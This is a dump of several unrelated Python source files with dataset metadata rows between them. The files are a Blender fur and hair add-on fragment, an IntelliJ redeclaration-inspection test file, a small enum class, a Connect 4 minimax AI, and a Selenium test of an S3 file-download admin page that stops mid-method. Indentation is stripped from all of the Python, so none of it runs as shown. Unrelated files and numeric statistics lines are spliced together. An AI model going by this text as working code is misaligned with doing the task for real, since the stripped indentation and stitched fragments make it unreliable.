hairMaterial.specular_intensity = 0.5
hairMaterial.specular_hardness = 100
hairMaterial.ambient = 0
hairMaterial.use_cubic = True
hairMaterial.use_transparency = True
hairMaterial.alpha = 0
hairMaterial.use_transparent_shadows = True
#strand
hairMaterial.strand.use_blender_units = True
hairMaterial.strand.root_size = 0.0002
hairMaterial.strand.tip_size = 0.0001
hairMaterial.strand.size_min = 0.3
hairMaterial.strand.width_fade = 0.1
hairMaterial.strand.shape = 0
hairMaterial.strand.blend_distance = 0.001
# add texture
hairTex = bpy.data.textures.new("ShortDarkHair", type='BLEND')
hairTex.use_preview_alpha = True
hairTex.use_color_ramp = True
ramp = hairTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.004025,0.002732,0.002428,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.141,0.122,0.107,0.2]
rampElement1 = rampElements.new(0.202)
rampElement1.color = [0.01885,0.0177,0.01827,0.65]
rampElement2 = rampElements.new(0.499)
rampElement2.color = [0.114,0.109,0.09822,0.87]
rampElement3 = rampElements.new(0.828)
rampElement3.color = [0.141,0.127,0.117,0.64]
# add texture to material
MTex = hairMaterial.texture_slots.add()
MTex.texture = hairTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
###############Create Particles##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
hairParticles = bpy.context.object.particle_systems.active
hairParticles.name = "ShortDarkHair"
hairParticles.settings.type = "HAIR"
hairParticles.settings.use_advanced_hair = True
hairParticles.settings.hair_step = 2
hairParticles.settings.count = 450
hairParticles.settings.normal_factor = 0.007
hairParticles.settings.factor_random = 0.001
hairParticles.settings.use_dynamic_rotation = True
hairParticles.settings.material = NumberOfMaterials
hairParticles.settings.use_strand_primitive = True
hairParticles.settings.use_hair_bspline = True
hairParticles.settings.render_step = 3
hairParticles.settings.length_random = 0.3
hairParticles.settings.display_step = 3
# children
hairParticles.settings.child_type = "INTERPOLATED"
hairParticles.settings.rendered_child_count = 200
hairParticles.settings.virtual_parents = 1
hairParticles.settings.clump_factor = 0.425
hairParticles.settings.clump_shape = 0.1
hairParticles.settings.roughness_endpoint = 0.003
hairParticles.settings.roughness_end_shape = 5
return {'FINISHED'}
####
######## FUR LAB ########
####
class FurLabPanel(bpy.types.Panel):
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
bl_label = "Fur Lab"
bl_context = "objectmode"
bl_options = {'DEFAULT_CLOSED'}
bl_category = "Create"
def draw(self, context):
active_obj = bpy.context.active_object
active_scn = bpy.context.scene.name
layout = self.layout
col = layout.column(align=True)
WhatToDo = getActionToDo(active_obj)
if WhatToDo == "GENERATE":
col.operator("fur.generate_fur", text="Create Fur")
col.prop(context.scene, "fur_type")
else:
col.label(text="Select mesh object")
if active_scn == "TestFurScene":
col.operator("hair.switch_back", text="Switch back to scene")
else:
col.operator("fur.test_scene", text="Create Test Scene")
# TO DO
"""
class saveSelection(bpy.types.Operator):
bl_idname = "save.selection"
bl_label = "Save Selection"
bl_description = "Save selected particles"
bl_register = True
bl_undo = True
def execute(self, context):
return {'FINISHED'}
"""
class testScene5(bpy.types.Operator):
bl_idname = "fur.switch_back"
bl_label = "Switch back to scene"
bl_description = "If you want keep this scene, switch scene in info window"
bl_register = True
bl_undo = True
def execute(self, context):
scene = bpy.context.scene
bpy.data.scenes.remove(scene)
return {'FINISHED'}
class testScene6(bpy.types.Operator):
bl_idname = "fur.test_scene"
bl_label = "Create test scene"
bl_description = "You can switch scene in info panel"
bl_register = True
bl_undo = True
def execute(self, context):
# add new scene
bpy.ops.scene.new(type="NEW")
scene = bpy.context.scene
scene.name = "TestFurScene"
# render settings
render = scene.render
render.resolution_x = 1920
render.resolution_y = 1080
render.resolution_percentage = 50
# add new world
world = bpy.data.worlds.new("FurWorld")
scene.world = world
world.use_sky_blend = True
world.use_sky_paper = True
world.horizon_color = (0.004393,0.02121,0.050)
world.zenith_color = (0.03335,0.227,0.359)
# add text
bpy.ops.object.text_add(location=(-0.292,0,-0.152), rotation =(1.571,0,0))
text = bpy.context.active_object
text.scale = (0.05,0.05,0.05)
text.data.body = "Fur Lab"
# add material to text
textMaterial = bpy.data.materials.new('textMaterial')
text.data.materials.append(textMaterial)
textMaterial.use_shadeless = True
# add camera
bpy.ops.object.camera_add(location = (0,-1,0),rotation = (1.571,0,0))
cam = bpy.context.active_object.data
cam.lens = 50
cam.display_size = 0.1
# add spot lamp
bpy.ops.object.lamp_add(type="SPOT", location = (-0.7,-0.5,0.3), rotation =(1.223,0,-0.960))
lamp1 = bpy.context.active_object.data
lamp1.name = "Key Light"
lamp1.energy = 1.5
lamp1.distance = 1.5
lamp1.shadow_buffer_soft = 5
lamp1.shadow_buffer_size = 8192
lamp1.shadow_buffer_clip_end = 1.5
lamp1.spot_blend = 0.5
# add spot lamp2
bpy.ops.object.lamp_add(type="SPOT", location = (0.7,-0.6,0.1), rotation =(1.571,0,0.785))
lamp2 = bpy.context.active_object.data
lamp2.name = "Fill Light"
lamp2.color = (0.874,0.874,1)
lamp2.energy = 0.5
lamp2.distance = 1.5
lamp2.shadow_buffer_soft = 5
lamp2.shadow_buffer_size = 4096
lamp2.shadow_buffer_clip_end = 1.5
lamp2.spot_blend = 0.5
# light Rim
"""
# add spot lamp3
bpy.ops.object.lamp_add(type="SPOT", location = (0.191,0.714,0.689), rotation =(0.891,0,2.884))
lamp3 = bpy.context.active_object.data
lamp3.name = "Rim Light"
lamp3.color = (0.194,0.477,1)
lamp3.energy = 3
lamp3.distance = 1.5
lamp3.shadow_buffer_soft = 5
lamp3.shadow_buffer_size = 4096
lamp3.shadow_buffer_clip_end = 1.5
lamp3.spot_blend = 0.5
"""
# add sphere
bpy.ops.mesh.primitive_uv_sphere_add(size=0.1)
bpy.ops.object.shade_smooth()
return {'FINISHED'}
class GenerateFur(bpy.types.Operator):
bl_idname = "fur.generate_fur"
bl_label = "Generate Fur"
bl_description = "Create a Fur"
bl_register = True
bl_undo = True
def execute(self, context):
# Make variable that is the current .blend file main data blocks
blend_data = context.blend_data
ob = bpy.context.active_object
scene = context.scene
######################################################################
########################Short Fur########################
if scene.fur_type == '0':
###############Create New Material##################
# add new material
furMaterial = bpy.data.materials.new('Fur 1')
ob.data.materials.append(furMaterial)
#Material settings
furMaterial.preview_render_type = "HAIR"
furMaterial.diffuse_color = (0.287, 0.216, 0.04667)
furMaterial.specular_color = (0.604, 0.465, 0.136)
furMaterial.specular_intensity = 0.3
furMaterial.ambient = 0
furMaterial.use_cubic = True
furMaterial.use_transparency = True
furMaterial.alpha = 0
furMaterial.use_transparent_shadows = True
#strand
furMaterial.strand.use_blender_units = True
furMaterial.strand.root_size = 0.00030
furMaterial.strand.tip_size = 0.00010
furMaterial.strand.size_min = 0.7
furMaterial.strand.width_fade = 0.1
furMaterial.strand.shape = 0.061
furMaterial.strand.blend_distance = 0.001
# add texture
furTex = bpy.data.textures.new("Fur1Tex", type='BLEND')
furTex.use_preview_alpha = True
furTex.use_color_ramp = True
ramp = furTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.114,0.05613,0.004025,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.267,0.155,0.02687,0]
rampElement1 = rampElements.new(0.111)
rampElement1.color = [0.281,0.168,0.03157,0.65]
rampElement2 = rampElements.new(0.366)
rampElement2.color = [0.288,0.135,0.006242,0.87]
rampElement3 = rampElements.new(0.608)
rampElement3.color = [0.247,0.113,0.006472,0.8]
rampElement4 = rampElements.new(0.828)
rampElement4.color = [0.253,0.09919,0.01242,0.64]
# add texture to material
MTex = furMaterial.texture_slots.add()
MTex.texture = furTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
###############Create Particles##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
furParticles = bpy.context.object.particle_systems.active
furParticles.name = "Fur1Par"
furParticles.settings.type = "HAIR"
furParticles.settings.use_advanced_hair = True
furParticles.settings.count = 500
furParticles.settings.normal_factor = 0.05
furParticles.settings.factor_random = 0.001
furParticles.settings.use_dynamic_rotation = True
furParticles.settings.material = NumberOfMaterials
furParticles.settings.use_strand_primitive = True
furParticles.settings.use_hair_bspline = True
furParticles.settings.render_step = 5
furParticles.settings.length_random = 0.5
furParticles.settings.display_step = 5
# children
furParticles.settings.child_type = "INTERPOLATED"
furParticles.settings.child_length = 0.134
furParticles.settings.create_long_hair_children = True
furParticles.settings.clump_factor = 0.55
furParticles.settings.roughness_endpoint = 0.005
furParticles.settings.roughness_end_shape = 5
furParticles.settings.roughness_2 = 0.003
furParticles.settings.roughness_2_size = 0.230
######################################################################
########################Dalmation Fur##########################
if scene.fur_type == '1':
###############Create New Material##################
# add new material
furMaterial = bpy.data.materials.new('Fur2Mat')
ob.data.materials.append(furMaterial)
#Material settings
furMaterial.preview_render_type = "HAIR"
furMaterial.diffuse_color = (0.300, 0.280, 0.280)
furMaterial.specular_color = (1.0, 1.0, 1.0)
furMaterial.specular_intensity = 0.500
furMaterial.specular_hardness = 50
furMaterial.ambient = 0
furMaterial.use_cubic = True
furMaterial.use_transparency = True
furMaterial.alpha = 0
furMaterial.use_transparent_shadows = True
#strand
furMaterial.strand.use_blender_units = True
furMaterial.strand.root_size = 0.00030
furMaterial.strand.tip_size = 0.00010
furMaterial.strand.size_min = 0.7
furMaterial.strand.width_fade = 0.1
furMaterial.strand.shape = 0.061
furMaterial.strand.blend_distance = 0.001
# add texture
furTex = bpy.data.textures.new("Fur2Tex", type='BLEND')
furTex.name = "Fur2"
furTex.use_preview_alpha = True
furTex.use_color_ramp = True
ramp = furTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [1.0,1.0,1.0,1.0]
rampElements[1].position = 1
rampElements[1].color = [1.0,1.0,1.0,0.0]
rampElement1 = rampElements.new(0.116)
rampElement1.color = [1.0,1.0,1.0,1.0]
# add texture to material
MTex = furMaterial.texture_slots.add()
MTex.texture = furTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
# add texture 2
furTex = bpy.data.textures.new("Fur2bTex", type='CLOUDS')
furTex.name = "Fur2b"
furTex.use_preview_alpha = False
furTex.cloud_type = "COLOR"
furTex.noise_type = "HARD_NOISE"
furTex.noise_scale = 0.06410
furTex.use_color_ramp = True
ramp = furTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [1.0,1.0,1.0, 1.0]
rampElements[1].position = 1
rampElements[1].color = [0.0,0.0,0.0,1.0]
rampElement1 = rampElements.new(0.317)
rampElement1.color = [1.0,1.0,1.0,1.0]
rampElement2 = rampElements.new(0.347)
rampElement2.color = [0.0,0.0,0.0,1.0]
# add texture 2 to material
MTex = furMaterial.texture_slots.add()
MTex.texture = furTex
MTex.texture_coords = "GLOBAL"
MTex.use_map_alpha = True
###############Create Particles##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
furParticles = bpy.context.object.particle_systems.active
furParticles.name = "Fur2Par"
furParticles.settings.type = "HAIR"
furParticles.settings.use_advanced_hair = True
furParticles.settings.count = 500
furParticles.settings.normal_factor = 0.05
furParticles.settings.factor_random = 0.001
furParticles.settings.use_dynamic_rotation = True
furParticles.settings.material = NumberOfMaterials
furParticles.settings.use_strand_primitive = True
furParticles.settings.use_hair_bspline = True
furParticles.settings.render_step = 5
furParticles.settings.length_random = 0.5
furParticles.settings.display_step = 5
# children
furParticles.settings.child_type = "INTERPOLATED"
furParticles.settings.child_length = 0.07227
furParticles.settings.create_long_hair_children = True
furParticles.settings.clump_factor = 0.55
furParticles.settings.roughness_endpoint = 0.005
furParticles.settings.roughness_end_shape = 5
furParticles.settings.roughness_2 = 0.003
furParticles.settings.roughness_2_size = 0.230
######################################################################
########################Spotted_fur##########################
elif scene.fur_type == '2':
###############Create New Material##################
# add new material
furMaterial = bpy.data.materials.new('Fur3Mat')
ob.data.materials.append(furMaterial)
#Material settings
furMaterial.preview_render_type = "HAIR"
furMaterial.diffuse_color = (0.300, 0.280, 0.280)
furMaterial.specular_color = (1.0, 1.0, 1.0)
furMaterial.specular_intensity = 0.500
furMaterial.specular_hardness = 50
furMaterial.use_specular_ramp = True
ramp = furMaterial.specular_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.0356,0.0152,0.009134,0]
rampElements[1].position = 1
rampElements[1].color = [0.352,0.250,0.231,1]
rampElement1 = rampElements.new(0.255)
rampElement1.color = [0.214,0.08244,0.0578,0.31]
rampElement2 = rampElements.new(0.594)
rampElement2.color = [0.296,0.143,0.0861,0.72]
furMaterial.ambient = 0
furMaterial.use_cubic = True
furMaterial.use_transparency = True
furMaterial.alpha = 0
furMaterial.use_transparent_shadows = True
#strand
furMaterial.strand.use_blender_units = True
furMaterial.strand.root_size = 0.00030
furMaterial.strand.tip_size = 0.00015
furMaterial.strand.size_min = 0.450
furMaterial.strand.width_fade = 0.1
furMaterial.strand.shape = 0.02
furMaterial.strand.blend_distance = 0.001
# add texture
furTex = bpy.data.textures.new("Fur3Tex", type='BLEND')
furTex.name = "Fur3"
furTex.use_preview_alpha = True
furTex.use_color_ramp = True
ramp = furTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.009721,0.006049,0.003677,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.04231,0.02029,0.01444,0.16]
rampElement1 = rampElements.new(0.111)
rampElement1.color = [0.01467,0.005307,0.00316,0.65]
rampElement2 = rampElements.new(0.366)
rampElement2.color = [0.0272,0.01364,0.01013,0.87]
rampElement3 = rampElements.new(0.608)
rampElement3.color = [0.04445,0.02294,0.01729,0.8]
rampElement4 = rampElements.new(0.828)
rampElement4.color = [0.04092,0.0185,0.01161,0.64]
# add texture to material
MTex = furMaterial.texture_slots.add()
MTex.texture = furTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
# add texture 2
furTex = bpy.data.textures.new("Fur3bTex", type='CLOUDS')
furTex.name = "Fur3b"
furTex.use_preview_alpha = True
furTex.cloud_type = "COLOR"
furTex.use_color_ramp = True
ramp = furTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.009721,0.006049,0.003677,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.04231,0.02029,0.01444,0.16]
rampElement1 = rampElements.new(0.111)
rampElement1.color = [0.01467,0.005307,0.00316,0.65]
rampElement2 = rampElements.new(0.366)
rampElement2.color = [0.0272,0.01364,0.01013,0.87]
rampElement3 = rampElements.new(0.608)
rampElement3.color = [0.04445,0.02294,0.01729,0.8]
rampElement4 = rampElements.new(0.828)
rampElement4.color = [0.04092,0.0185,0.01161,0.64]
# add texture 2 to material
MTex = furMaterial.texture_slots.add()
MTex.texture = furTex
MTex.texture_coords = "GLOBAL"
MTex.use_map_alpha = False
###############Create Particles##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
furParticles = bpy.context.object.particle_systems.active
furParticles.name = "Fur3Par"
furParticles.settings.type = "HAIR"
furParticles.settings.use_advanced_hair = True
furParticles.settings.count = 500
furParticles.settings.normal_factor = 0.05
furParticles.settings.factor_random = 0.001
furParticles.settings.use_dynamic_rotation = True
furParticles.settings.material = NumberOfMaterials
furParticles.settings.use_strand_primitive = True
furParticles.settings.use_hair_bspline = True
furParticles.settings.render_step = 5
furParticles.settings.length_random = 0.5
furParticles.settings.display_step = 5
# children
furParticles.settings.child_type = "INTERPOLATED"
furParticles.settings.child_length = 0.134
furParticles.settings.create_long_hair_children = True
furParticles.settings.clump_factor = 0.55
furParticles.settings.roughness_endpoint = 0.005
furParticles.settings.roughness_end_shape = 5
furParticles.settings.roughness_2 = 0.003
furParticles.settings.roughness_2_size = 0.230
return {'FINISHED'}
def register():
bpy.utils.register_module(__name__)
bpy.types.Scene.grass_type = EnumProperty(
name="Type",
description="Select the type of grass",
items=[("0","Green Grass","Generate particle grass"),
("1","Grassy Field","Generate particle grass"),
("2","Clumpy Grass","Generate particle grass"),
],
default='0')
bpy.types.Scene.hair_type = EnumProperty(
name="Type",
description="Select the type of hair",
items=[("0","Long Red Straight Hair","Generate particle Hair"),
("1","Long Brown Curl Hair","Generate particle Hair"),
("2","Short Dark Hair","Generate particle Hair"),
],
default='0')
bpy.types.Scene.fur_type = EnumProperty(
name="Type",
description="Select the type of fur",
items=[("0","Short Fur","Generate particle Fur"),
("1","Dalmation","Generate particle Fur"),
("2","Fur3","Generate particle Fur"),
],
default='0')
def unregister():
bpy.utils.unregister_module(__name__)
del bpy.types.Scene.hair_type
if __name__ == "__main__":
register()
| 38.021291 | 103 | 0.607689 | 6,542 | 57,146 | 5.17701 | 0.092021 | 0.016653 | 0.020314 | 0.013641 | 0.872505 | 0.813895 | 0.796209 | 0.789683 | 0.782095 | 0.774477 | 0 | 0.07643 | 0.267805 | 57,146 | 1,502 | 104 | 38.046605 | 0.732996 | 0.057222 | 0 | 0.723902 | 0 | 0.000976 | 0.0607 | 0.001336 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014634 | false | 0 | 0.001951 | 0 | 0.101463 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c5f73954cc89bc71943e49fcdb8cfcd3c74ef143 | 331 | py | Python | python/testData/inspections/PyRedeclarationInspection/redeclaredTopLevel.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/inspections/PyRedeclarationInspection/redeclaredTopLevel.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/inspections/PyRedeclarationInspection/redeclaredTopLevel.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | def TopLevelBoo():
pass
<warning descr="Redeclared 'TopLevelBoo' defined above without usage">TopLevelBoo</warning> = 1
<warning descr="Redeclared 'TopLevelBoo' defined above without usage">TopLevelBoo</warning> = 2
class <warning descr="Redeclared 'TopLevelBoo' defined above without usage">TopLevelBoo</warning>:
pass | 33.1 | 98 | 0.767372 | 37 | 331 | 6.864865 | 0.351351 | 0.141732 | 0.259843 | 0.389764 | 0.885827 | 0.885827 | 0.885827 | 0.885827 | 0.885827 | 0.885827 | 0 | 0.006897 | 0.123867 | 331 | 10 | 99 | 33.1 | 0.868966 | 0 | 0 | 0.333333 | 0 | 0 | 0.46988 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.333333 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 10 |
a8506282a9ed15a0002daf26ecc312c6feab386e | 524 | py | Python | jarvy/actions.py | jarvy/jarvy | 8a1e29559b959f8fa8b867cb406b8bc73b898dbf | [
"MIT"
] | 16 | 2015-07-21T12:22:49.000Z | 2021-06-02T03:44:50.000Z | jarvy/actions.py | jarvy/jarvy | 8a1e29559b959f8fa8b867cb406b8bc73b898dbf | [
"MIT"
] | null | null | null | jarvy/actions.py | jarvy/jarvy | 8a1e29559b959f8fa8b867cb406b8bc73b898dbf | [
"MIT"
] | 7 | 2015-07-29T08:48:15.000Z | 2018-05-18T00:16:59.000Z |
class Actions:
def __init__(self):
pass
about_jarvy = 1
direct_address = 2
about_master = 3
search_google = 4
search_wolfram = 5
search_wikipedia = 6
say_sorry = 7
# def enum(**enums):
# return type('Enum', (), enums)
#
# actions = enum(about_jarvy=1,
# direct_address=2,
# about_master=3,
# search_google=4,
# search_wolfram=5,
# search_wikipedia=6,
# say_sorry=7
# )
| 18.714286 | 36 | 0.505725 | 57 | 524 | 4.333333 | 0.491228 | 0.080972 | 0.089069 | 0.137652 | 0.720648 | 0.720648 | 0.720648 | 0.720648 | 0.720648 | 0.720648 | 0 | 0.044304 | 0.396947 | 524 | 27 | 37 | 19.407407 | 0.737342 | 0.555344 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.1 | 0 | 0 | 0.9 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
a89a463eeedb9527a2edf7481977d92647ca22d7 | 4,567 | py | Python | minimaxAI.py | MihirJoe/Connect4 | 3838651e83c9cd0dde0df2e278442abbf2112aec | [
"MIT"
] | null | null | null | minimaxAI.py | MihirJoe/Connect4 | 3838651e83c9cd0dde0df2e278442abbf2112aec | [
"MIT"
] | null | null | null | minimaxAI.py | MihirJoe/Connect4 | 3838651e83c9cd0dde0df2e278442abbf2112aec | [
"MIT"
] | 1 | 2022-03-27T20:41:08.000Z | 2022-03-27T20:41:08.000Z | import numpy as np
import math
import random
from board import *
import settings
# implements minimax with alpha beta pruning
def minimax_alphabeta(board, moveCount, depth, alpha, beta, maximizingPlayer):
valid_columns = all_valid_columns(board)
random.shuffle(valid_columns) # shuffle the valid columns so do not always search in the same order
# Setup to leave recursion if at depth limit or if the board contains a win.
# if the depth is reached, return current value of the heuristic
if depth == 0:
return None, score_board(board, settings.AI)
# if the board is full or has a win with the theoretical move
if is_end_node(board):
# return score of win for AI while factoring in number of moves
if is_win(board, settings.AI):
return None, 9999999 - moveCount
# return score of win for player while factoring in number of moves
if is_win(board, settings.PLAYER):
return None, -9999999 + moveCount
else:
return None, 0
# Maximizing player section.
if maximizingPlayer:
bestScore = -math.inf # initialize best score
# loop through all open/valid columns
for col in valid_columns:
boardCopy = board.copy()
add_token(boardCopy, col, settings.AI)
newScore = minimax_alphabeta(boardCopy, moveCount + 1, depth - 1, alpha, beta, False)[1] # compute new score of theoretical move
# update bestScore if newScore is better
if newScore > bestScore:
bestScore = newScore
column = col
# update alpha
alpha = max(alpha, bestScore)
if alpha >= beta:
break
return column, bestScore
# Minimizing player section.
else:
bestScore = math.inf # initialize best score
# loop through all open/valid columns
for col in valid_columns:
boardCopy = board.copy()
add_token(boardCopy, col, settings.PLAYER)
newScore = minimax_alphabeta(boardCopy, moveCount + 1, depth - 1, alpha, beta, True)[1]
# if newScore is less than bestScore (better option), update best score
if newScore < bestScore:
bestScore = newScore
column = col
# update beta
beta = min(beta, bestScore)
if alpha >= beta:
break
return column, bestScore
# implements minimax WITHOUT alpha beta pruning
def minimax(board, moveCount, depth, maximizingPlayer):
valid_columns = all_valid_columns(board)
random.shuffle(valid_columns) # shuffle the valid columns so do not always search in the same order
# Setup to leave recursion if at depth limit or if the board contains a win.
# if the depth is reached, return current value of the heuristic
if depth == 0:
return None, score_board(board, settings.AI)
# if the board is full or has a win with the theoretical move
if is_end_node(board):
# return score of win for AI while factoring in number of moves
if is_win(board, settings.AI):
return None, 9999999 - moveCount
# return score of win for player while factoring in number of moves
if is_win(board, settings.PLAYER):
return None, -9999999 + moveCount
else:
return None, 0
# Maximizing player section.
if maximizingPlayer:
bestScore = -math.inf # initialize best score
# loop through all open/valid columns
for col in valid_columns:
boardCopy = board.copy()
add_token(boardCopy, col, settings.AI)
newScore = minimax(boardCopy, moveCount + 1, depth - 1, False)[1] # compute new score of theoretical move
# update bestScore if newScore is better
if newScore > bestScore:
bestScore = newScore
column = col
return column, bestScore
# Minimizing player section.
else:
bestScore = math.inf # initialize best score
# loop through all open/valid columns
for col in valid_columns:
boardCopy = board.copy()
add_token(boardCopy, col, settings.PLAYER)
newScore = minimax(boardCopy, moveCount + 1, depth - 1, True)[1]
# if newScore is less than bestScore (better option), update best score
if newScore < bestScore:
bestScore = newScore
column = col
return column, bestScore | 41.144144 | 140 | 0.628202 | 560 | 4,567 | 5.071429 | 0.178571 | 0.067606 | 0.014085 | 0.022535 | 0.929577 | 0.911268 | 0.911268 | 0.893662 | 0.864437 | 0.864437 | 0 | 0.014031 | 0.313335 | 4,567 | 111 | 141 | 41.144144 | 0.891582 | 0.336107 | 0 | 0.826667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026667 | false | 0 | 0.066667 | 0 | 0.253333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
765867cfcac2765a1eb776727967addf86145a9f | 8,294 | py | Python | tests/src/Admin_console/S3_files_script.py | JalajaTR/cQube | 6bf58ab25f0c36709630987ab730bbd5d9192c03 | [
"MIT"
] | null | null | null | tests/src/Admin_console/S3_files_script.py | JalajaTR/cQube | 6bf58ab25f0c36709630987ab730bbd5d9192c03 | [
"MIT"
] | 2 | 2022-02-01T00:55:12.000Z | 2022-03-29T22:29:09.000Z | tests/src/Admin_console/S3_files_script.py | JalajaTR/cQube | 6bf58ab25f0c36709630987ab730bbd5d9192c03 | [
"MIT"
] | null | null | null | import time
import unittest
from selenium.webdriver.support.select import Select
from Data.parameters import Data
from get_dir import pwd
from reuse_func import GetData
class Test_s3files(unittest.TestCase):
@classmethod
def setUpClass(self):
self.data = GetData()
self.p = pwd()
self.driver = self.data.get_driver()
self.data.open_cqube_appln(self.driver)
print(self.driver.title)
self.data.page_loading(self.driver)
self.data.login_to_adminconsole(self.driver)
def test_navigate_to_s3files(self):
self.driver.find_element_by_id(Data.Dashboard).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id("downloads").click()
self.data.page_loading(self.driver)
if "s3FileDownload" in self.driver.current_url:
print("s3FileDownload page is displayed")
else:
print("s3FileDownload is not exists ")
self.data.page_loading(self.driver)
self.driver.find_element_by_id("homeBtn").click()
self.data.page_loading(self.driver)
def test_s3files_icon(self):
count = 0
self.data.page_loading(self.driver)
self.driver.find_element_by_id('s3dwn').click()
if "s3FileDownload" in self.driver.current_url:
print("s3FileDownload page is displayed")
else:
print("s3FileDownload is not exists ")
count = count + 1
self.data.page_loading(self.driver)
self.assertEqual(0,count,msg="S3files icon is not working ")
self.data.page_loading(self.driver)
self.driver.find_element_by_id("homeBtn").click()
self.data.page_loading(self.driver)
def test_bucket_list(self):
self.driver.find_element_by_id(Data.Dashboard).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id("downloads").click()
self.data.page_loading(self.driver)
print("choosing radio button and downloading s3 files")
bucket_name = Select(self.driver.find_element_by_name("bucketName"))
for i in range(1, len(bucket_name.options)):
bucket_name.select_by_index(i)
print(bucket_name.options[i].text,"is present and selected")
self.data.page_loading(self.driver)
self.assertNotEqual(0,len(bucket_name.options)-1,msg="Bucket names are not exists")
self.data.page_loading(self.driver)
self.driver.find_element_by_id("homeBtn").click()
self.data.page_loading(self.driver)
def test_select_cqube_input(self):
self.driver.find_element_by_id(Data.Dashboard).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id("downloads").click()
self.data.page_loading(self.driver)
bucket_name = Select(self.driver.find_element_by_name("bucketName"))
bucket_name.select_by_index(2)
print(bucket_name.options[2].text,'is selected ')
self.data.page_loading(self.driver)
self.driver.find_element_by_id("homeBtn").click()
self.data.page_loading(self.driver)
def test_bucket(self):
self.driver.find_element_by_id(Data.Dashboard).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id("downloads").click()
self.data.page_loading(self.driver)
print("choosing radio button and downloading s3 files")
bucket_name = Select(self.driver.find_element_by_name("bucketName"))
for i in range(1,len(bucket_name.options)-1):
bucket_name.select_by_index(i)
self.data.page_loading(self.driver)
self.driver.find_element_by_xpath(Data.s3bucket_select1).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id("btn").click()
time.sleep(3)
self.data.page_loading(self.driver)
self.driver.find_element_by_id("btn").click()
time.sleep(3)
self.data.page_loading(self.driver)
self.driver.find_element_by_id("homeBtn").click()
self.data.page_loading(self.driver)
def test_cqubegj_raw(self):
self.driver.find_element_by_id(Data.Dashboard).click()
self.data.page_loading(self.driver)
self.driver.find_element_by_id("downloads").click()
self.data.page_loading(self.driver)
bucket_name = Select(self.driver.find_element_by_name("bucketName"))
bucket_name.select_by_index(1)
print(bucket_name.options[1].text,'is selected ')
self.data.page_loading(self.driver)
self.driver.find_element_by_id("btn")
if "s3FileDownload" in self.driver.current_url:
print("s3FileDownload page is displayed")
else:
print("s3FileDownload is not exists ")
self.data.page_loading(self.driver)
self.driver.find_element_by_id('btn').click()
self.data.page_loading(self.driver)
def test_cqube_input(self):
